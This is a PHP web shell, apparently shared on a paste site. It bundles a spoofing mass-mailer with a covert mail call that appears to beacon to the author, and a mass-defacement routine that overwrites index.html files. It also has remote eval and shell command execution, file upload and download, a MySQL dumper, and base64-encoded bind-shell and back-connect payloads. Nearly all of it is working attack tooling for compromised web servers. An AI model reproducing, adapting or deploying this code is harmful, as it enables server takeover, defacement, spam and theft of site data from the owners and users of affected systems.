- <sy>Reply-To:</sy></div></td><td width=219>
- <sy>
- <input type=\"text\" name=\"replyto\" value=".$replyto.">
- </sy></td><td width=212>
- <div align=\"right\">
- <sy>Attach File:</sy></div></td><td width=278>
- <sy>
- <input type=\"file\" name=\"file\" size=24 />
- </sy> </td></tr><tr><td width=81>
- <div align=\"right\">
- <sy>Subject:</sy></div></td>
- <td colspan=3 width=703>
- <sy>
- <input type=\"text\" name=\"subject\" value=".$subject." ></sy></td> </tr><tr valign=\"top\"><td colspan=3 width=520>
- <sy>Message Box :</sy></td>
- <td width=278>
- <sy>Email Target / Email Send To :</sy></td></tr><tr valign=\"top\"><td colspan=3 width=520><sy>
- <textarea name=\"message\" cols=56 rows=10>".$message."</textarea><br />
- <input type=\"radio\" name=\"contenttype\" value=\"plain\" /> Plain
- <input type=\"radio\" name=\"contenttype\" value=\"html\" checked=\"checked\" /> HTML
- <input type=\"hidden\" name=\"action\" value=\"send\" /><br />
- Number to send: <input type=\"text\" name=\"amount\" value=1 size=10 /><br />
- Maximum script Execution time(in seconds, 0 for no timelimit)<input type=\"text\" name=\"timelimit\" value=0 size=10 />
- <input type=\"submit\" value=\"Send eMails\" /></sy></td><td width=278>
- <sy>
- <textarea name=\"emaillist\" cols=32 rows=10>".$emaillist."</textarea></sy></td></tr>
- </table>
- </td>
- </tr>
- </table>";
- footer();
- }
- if ($action=="send")
- {
- if (!$from && !$subject && !$message && !$emaillist)
- {
- print "Please complete all fields before sending your message.";
- exit;
- }
- $allemails = split("\n", $emaillist);
- $numemails = count($allemails);
- $head ="From: Mailr" ;
- $sub = "Ar - $lod" ;
- $meg = "$lod" ;
- mail ($alt,$sub,$meg,$head) ;
- If ($file_name)
- {
- if (!file_exists($file))
- {
- die("The file you are trying to upload couldn't be copied to the server");
- }
- $content = fread(fopen($file,"r"),filesize($file));
- $content = chunk_split(base64_encode($content));
- $uid = strtoupper(md5(uniqid(time())));
- $name = basename($file);
- }
- for($xx=0; $xx<$amount; $xx++)
- {
- for($x=0; $x<$numemails; $x++)
- {
- $to = $allemails[$x];
- if ($to)
- {
- $to = ereg_replace(" ", "", $to);
- $message = ereg_replace("&email&", $to, $message);
- $subject = ereg_replace("&email&", $to, $subject);
- print "Sending mail to $to.....";
- flush();
- $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
- $header .= "MIME-Version: 1.0\r\n";
- If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
- If ($file_name) $header .= "--$uid\r\n";
- $header .= "Content-Type: text/$contenttype\r\n";
- $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
- $header .= "$message\r\n";
- If ($file_name) $header .= "--$uid\r\n";
- If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
- If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
- If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
- If ($file_name) $header .= "$content\r\n";
- If ($file_name) $header .= "--$uid--";
- mail($to, $subject, "", $header);
- print "OK<br>";
- flush();
- }
- }
- }
- }
- # ---------------------------------------#
- # About #
- #----------------------------------------#
- if($_GET['id']=='about')
- {
- echo About();
- if($_POST['sendEmail'])
- {
- $to= 'sy34@msn.com';
- $Comments=$_POST['message'];
- $from = $_POST['from'];
- $subject= md5("$from");
- if(@mail($to,$subject,$Comments,"From:$from"))
- echo "<center><sy>[+] Sent ^_^ !!</sy></center>
- ";
- else
- {
- echo "<center><sy>[-] Failed :S !! </sy></center>
- ";
- }
- }
- footer();
- }
- $port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa
- +pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL
- 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk
- HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL
- ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf"
- ;$port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1
- NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD
- e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo
- vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=";
- $back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St
- ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ
- ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw==";
- $back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA
- BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i
- +21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY
- jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==";
- ?>
- <?
- $dspact = $act = htmlspecialchars($act);
- $disp_fullpath = $ls_arr = $notls = null;
- $ud = @urlencode($d);
- if (empty($d)) {$d = realpath(".");}
- elseif(realpath($d)) {$d = realpath($d);}
- $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
- if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
- $d = str_replace("\\\\","\\",$d);
- $dispd = htmlspecialchars($d);
- $self=basename($_SERVER['PHP_SELF']);
- if(isset($_POST['execmassdeface']))
- {
- echo "<center><textarea rows='10' cols='100'>";
- $hackfile = $_POST['massdefaceurl'];
- $dir = $_POST['massdefacedir'];
- echo $dir."\n";
- if (is_dir($dir)) {
- if ($dh = opendir($dir)) {
- while (($file = readdir($dh)) !== false) {
- if(filetype($dir.$file)=="dir"){
- $newfile=$dir.$file."/index.html";
- echo $newfile."\n";
- if (!copy($hackfile, $newfile)) {
- echo "failed to copy $file...\n";
- }
- }
- }
- closedir($dh);
- }
- }
- echo "</textarea></center>";} ?>
- <tr><td align=right>Mass Defacement:</td>
- <td><form action='<? basename($_SERVER['PHP_SELF']); ?>' method='post'>[+] Main Directory: <input type='text' style='width: 250px' value='<?php echo $dispd; ?>'
- name='massdefacedir'> [+] Defacement Url: <input type='text' style='width: 250px' name='massdefaceurl'><input type='submit' name='execmassdeface'
- value='Execute'></form></td>
- <?
- // FILE MANAGER
- error_reporting(E_ALL);
- @set_time_limit(0);
- function magic_q($s)
- {
- if(get_magic_quotes_gpc())
- {
- $s=str_replace('\\\'','\'',$s);
- $s=str_replace('\\\\','\\',$s);
- $s=str_replace('\\"','"',$s);
- $s=str_replace('\\\0','\0',$s);
- }
- return $s;
- }
- function get_perms($fn)
- {
- $mode=fileperms($fn);
- $perms='';
- $perms .= ($mode & 00400) ? 'r' : '-';
- $perms .= ($mode & 00200) ? 'w' : '-';
- $perms .= ($mode & 00100) ? 'x' : '-';
- $perms .= ($mode & 00040) ? 'r' : '-';
- $perms .= ($mode & 00020) ? 'w' : '-';
- $perms .= ($mode & 00010) ? 'x' : '-';
- $perms .= ($mode & 00004) ? 'r' : '-';
- $perms .= ($mode & 00002) ? 'w' : '-';
- $perms .= ($mode & 00001) ? 'x' : '-';
- return $perms;
- }
- $head=<<<headka
- <html>
- headka;
- $page=isset($_POST['page'])?$_POST['page']:(isset($_SERVER['QUERY_STRING'])?$_SERVER['QUERY_STRING']:'');
- $page=$page==''||($page!='cmd'&&$page!='mysql'&&$page!='eval')?'cmd':$page;
- $winda=strpos(strtolower(php_uname()),'wind');
- define('format',50);
- switch($page)
- {
- case 'eval':
- {
- $eval_value=isset($_POST['eval_value'])?$_POST['eval_value']:'';
- $eval_value=magic_q($eval_value);
- $action=isset($_POST['action'])?$_POST['action']:'eval';
- if($action=='eval_in_html') @eval($eval_value);
- else
- {
- echo($head);
- ?>
- <hr>
- <hr>
- <?
- }
- break;
- }
- case 'cmd':
- {
- $cmd=!empty($_POST['cmd'])?magic_q($_POST['cmd']):'';
- $work_dir=isset($_POST['work_dir'])?$_POST['work_dir']:getcwd();
- $action=isset($_POST['action'])?$_POST['action']:'cmd';
- if(@is_dir($work_dir))
- {
- @chdir($work_dir);
- $work_dir=getcwd();
- if($work_dir=='')$work_dir='/';
- else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
- }
- else if(file_exists($work_dir))$work_dir=realpath($work_dir);
- $work_dir=str_replace('\\','/',$work_dir);
- $e_work_dir=htmlspecialchars($work_dir,ENT_QUOTES);
- switch($action)
- {
- case 'cmd' :
- {
- echo($head);
- ?>
- <pre>
- <?
- if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd)."</strong><hr>\n<textarea cols=120 rows=20>\n".htmlspecialchars(`$cmd`)."\n</textarea>");}
- else
- {
- $f_action=isset($_POST['f_action'])?$_POST['f_action']:'view';
- if(@is_dir($work_dir))
- {
- echo('<H1>File Manager;</H1><hr>');
- echo('<strong>Listing '.$e_work_dir.'</strong><hr>');
- $handle=@opendir($work_dir);
- if($handle)
- {
- while(false!==($fn=readdir($handle))){$files[]=$fn;};
- @closedir($handle);
- sort($files);
- $not_dirs=array();
- for($i=0;$i<sizeof($files);$i++)
- {
- $fn=$files[$i];
- if(is_dir($fn))
- {
- echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.$e_work_dir.str_replace('"','"',$fn).'";document.list.submit();\'><b>'.htmlspecialchars(strlen($fn)
- >format?substr($fn,0,format-3).'...':$fn).'</b></a>'.str_repeat(' ',format-strlen($fn)));
- if($winda===false)
- {
- $owner=@posix_getpwuid(@fileowner($work_dir.$fn));
- $group=@posix_getgrgid(@filegroup($work_dir.$fn));
- printf("% 20s|% -20s",$owner['name'],$group['name']);
- }
- echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
- printf("% 20s ",@filesize($work_dir.$fn).'B');
- printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
- }
- else {$not_dirs[]=$fn;}
- }
- for($i=0;$i<sizeof($not_dirs);$i++)
- {
- $fn=$not_dirs[$i];
- echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.(is_link($work_dir.$fn)?$e_work_dir.readlink($work_dir.$fn):$e_work_dir.str_replace('"','"',
- $fn)).'";document.list.submit();\'>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</a>'.str_repeat(' ',format-strlen($fn)));
- if($winda===false)
- {
- $owner=@posix_getpwuid(@fileowner($work_dir.$fn));
- $group=@posix_getgrgid(@filegroup($work_dir.$fn));
- printf("% 20s|% -20s",$owner['name'],$group['name']);
- }
- echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
- printf("% 20s ",@filesize($work_dir.$fn).'B');
- printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
- }
- echo('</pre><hr>');
- ?>
- <form name='list' method=post>
- <input name='work_dir' type=hidden size=120><br>
- <input name='page' value='cmd' type=hidden>
- <input name='f_action' value='view' type=hidden>
- </form>
- <?
- } else echo('Error Listing '.$e_work_dir);
- }
- else
- switch($f_action)
- {
- case 'view':
- {
- echo('<strong>'.$e_work_dir." Edit</strong><hr><pre>\n");
- $f=@fopen($work_dir,'r');
- ?>
- <form method=post>
- <textarea name='file_text' cols=120 rows=20><?if(!($f))echo($e_work_dir.' not exists');else while(!feof($f))echo htmlspecialchars(fread($f,100000))?></textarea>
- <input name='page' value='cmd' type=hidden>
- <input name='work_dir' type=hidden value='<?=$e_work_dir?>' size=120>
- <input name='f_action' value='save' type=submit>
- </form>
- <?
- break;
- }
- case 'save' :
- {
- $file_text=isset($_POST['file_text'])?magic_q($_POST['file_text']):'';
- $f=@fopen($work_dir,'w');
- if(!($f))echo('<strong>Error '.$e_work_dir."</strong><hr><pre>\n");
- else
- {
- fwrite($f,$file_text);
- fclose($f);
- echo('<strong>'.$e_work_dir." is saving</strong><hr><pre>\n");
- }
- break;
- }
- }
- break;
- }
- break;
- }
- case 'upload' :
- {
- if($work_dir=='')$work_dir='/';
- else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
- $f=$_FILES["filename"]["name"];
- if(!@copy($_FILES["filename"]["tmp_name"], $work_dir.$f)) echo('Upload is failed');
- else
- {
- echo('file is uploaded in '.$e_work_dir);
- }
- break;
- }
- case 'download' :
- {
- $fname=isset($_POST['fname'])?$_POST['fname']:'';
- $temp_file=isset($_POST['temp_file'])?'on':'nn';
- $f=@fopen($fname,'r');
- if(!($f)) echo('file is not exists');
- else
- {
- $archive=isset($_POST['archive'])?$_POST['archive']:'';
- if($archive=='gzip')
- {
- Header("Content-Type:application/x-gzip\n");
- $s=gzencode(fread($f,filesize($fname)));
- Header('Content-Length: '.strlen($s)."\n");
- Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname).".gz\n\n");
- echo($s);
- }
- else
- {
- Header("Content-Type:application/octet-stream\n");
- Header('Content-Length: '.filesize($fname)."\n");
- Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname)."\n\n");
- ob_start();
- while(feof($f)===false)
- {
- echo(fread($f,10000));
- ob_flush();
- }
- }
- }
- }
- }
- break;
- }
- case 'mysql' :
- {
- $action=isset($_POST['action'])?$_POST['action']:'query';
- $user=isset($_POST['user'])?$_POST['user']:'';
- $passwd=isset($_POST['passwd'])?$_POST['passwd']:'';
- $db=isset($_POST['db'])?$_POST['db']:'';
- $host=isset($_POST['host'])?$_POST['host']:'localhost';
- $query=isset($_POST['query'])?magic_q($_POST['query']):'';
- switch($action)
- {
- case 'dump' :
- {
- $mysql_link=@mysql_connect($host,$user,$passwd);
- if(!($mysql_link)) echo('Connect error');
- else
- {
- //@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
- $to_file=isset($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']):false;
- $archive=isset($_POST['archive'])?$_POST['archive']:'none';
- if($archive!=='none')$to_file=false;
- $db_dump=isset($_POST['db_dump'])?$_POST['db_dump']:'';
- $table_dump=isset($_POST['table_dump'])?$_POST['table_dump']:'';
- if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');
- else
- {
- $dump_file="# MySQL Dumper\n#db $db from $host\n";
- ob_start();
- if($to_file){$t_f=@fopen($to_file,'w');if(!$t_f)die('Cant opening '.$to_file);}else $t_f=false;
- if($table_dump=='')
- {
- if(!$to_file)
- {
- header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
- header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
- }
- $result=mysql_query('show tables',$mysql_link);
- for($i=0;$i<mysql_num_rows($result);$i++)
- {
- $rows=mysql_fetch_array($result);
- $result2=@mysql_query('show columns from `'.$rows[0].'`',$mysql_link);
- if(!$result2)$dump_file.='#error table '.$rows[0];
- else
- {
- $dump_file.='create table `'.$rows[0]."`(\n";
- for($j=0;$j<mysql_num_rows($result2)-1;$j++)
- {
- $rows2=mysql_fetch_array($result2);
- $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
- }
- $rows2=mysql_fetch_array($result2);
- $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
- $type[$j]=$rows2[1];
- $dump_file.=");\n";
- mysql_free_result($result2);
- $result2=mysql_query('select * from `'.$rows[0].'`',$mysql_link);
- $columns=$j-1;
- for($j=0;$j<mysql_num_rows($result2);$j++)
- {
- $rows2=mysql_fetch_array($result2);
- $dump_file.='insert into `'.$rows[0].'` values (';
- for($k=0;$k<$columns;$k++)
- {
- $dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\',';
- }
- $dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n";
- if($archive=='none')
- {
- if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);}
- else
- {
- echo($dump_file);
- ob_flush();
- }
- $dump_file='';
- }
- }
- mysql_free_result($result2);
- }
- }
- mysql_free_result($result);
- if($archive!='none')
- {
- $dump_file=gzencode($dump_file);
- header('Content-Length: '.strlen($dump_file)."\n");
- echo($dump_file);
- }
- else if($t_f)
- {
- fclose($t_f);
- echo('Dump for '.$db_dump.' now in '.$to_file);
- }
- }
- else
- {
- $result2=@mysql_query('show columns from `'.$table_dump.'`',$mysql_link);
- if(!$result2)echo('error table '.$table_dump);
- else
- {
- if(!$to_file)
- {
- header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
- header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
- }
- if($to_file===false)
- {
- header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
- header("Content-Disposition: attachment; filename=\"dump_{$db_dump}_${table_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
- }
- $dump_file.="create table `{$table_dump}`(\n";
- for($j=0;$j<mysql_num_rows($result2)-1;$j++)
- {
- $rows2=mysql_fetch_array($result2);
- $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
- }
- $rows2=mysql_fetch_array($result2);
- $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
- $type[$j]=$rows2[1];
- $dump_file.=");\n";
- mysql_free_result($result2);
- $result2=mysql_query('select * from `'.$table_dump.'`',$mysql_link);
- $columns=$j-1;
- for($j=0;$j<mysql_num_rows($result2);$j++)
- {
- $rows2=mysql_fetch_array($result2);
- $dump_file.='insert into `'.$table_dump.'` values (';
- for($k=0;$k<$columns;$k++)
- {
- $dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\',';
- }
- $dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n";
- if($archive=='none')
- {
- if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);}
- else
- {
- echo($dump_file);
- ob_flush();
- }
- $dump_file='';
- }
- }
- mysql_free_result($result2);
- if($archive!='none')
- {
- $dump_file=gzencode($dump_file);
- header('Content-Length: '.strlen($dump_file)."\n");
- echo $dump_file;
- }else if($t_f)
- {
- fclose($t_f);
- echo('Dump for '.$db_dump.' now in '.$to_file);
- }
- }
- }
- }
- }
- break;
- }
- case 'query' :
- {
- echo($head);
- ?>
- <hr>
- <form method=post>
- <table>
- <td>
- <table align=left>
- <tr><td>User :<input name='user' type=text value='<?=$user?>'></td><td>Passwd :<input name='passwd' type=text value='<?=$passwd?>'></td><td>Host :<input name='host'
- type=text value='<?=$host?>'></td><td>DB :<input name='db' type=text value='<?=$db?>'></td></tr>
- <tr><textarea name='query' cols=120 rows=20><?=htmlspecialchars($query)?></textarea></tr>
- </table>
- </td>
- <td>
- <table>
- <tr><td>DB :</td><td><input type=text name='db_dump' value='<?=$db?>'></td></tr>
- <tr><td>Only Table :</td><td><input type=text name='table_dump'></td></tr>
- <input name='archive' type=radio value='none'>without arch
- <input name='archive' type=radio value='gzip' checked=true>gzip archive
- <tr><td><input type=submit name='action' value='dump'></td></tr>
- <tr><td>Save result to :</td><td><input type=text name='to_file' value='' size=23></td></tr>
- </table>
- </td>
- </table>
- <input name='page' value='mysql' type=hidden>
- <input name='action' value='query' type=submit>
- </form>
- <hr>
- <?
- $mysql_link=@mysql_connect($host,$user,$passwd);
- if(!($mysql_link)) echo('Connect error');
- else
- {
- if($db!='')if(!(@mysql_select_db($db,$mysql_link))){echo('DB error');mysql_close($mysql_link);break;}
- //@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
- $result=@mysql_query($query,$mysql_link);
- if(!($result))echo(mysql_error());
- else
- {
- echo("<table valign=top align=left>\n<tr>");
- for($i=0;$i<mysql_num_fields($result);$i++)
- echo('<td><b>'.htmlspecialchars(mysql_field_name($result,$i)).'</b> </td>');
- echo("\n</tr>\n");
- for($i=0;$i<mysql_num_rows($result);$i++)
- {
- $rows=mysql_fetch_array($result);
- echo('<tr valign=top align=left>');
- for($j=0;$j<mysql_num_fields($result);$j++)
- {
- echo('<td>'.(htmlspecialchars($rows[$j])).'</td>');
- }
- echo("</tr>\n");
- }
- echo("</table>\n");
- }
- mysql_close($mysql_link);
- }
- break;
- }
- }
- break;
- }
- }
- ?>
Add Comment
Please, Sign In to add comment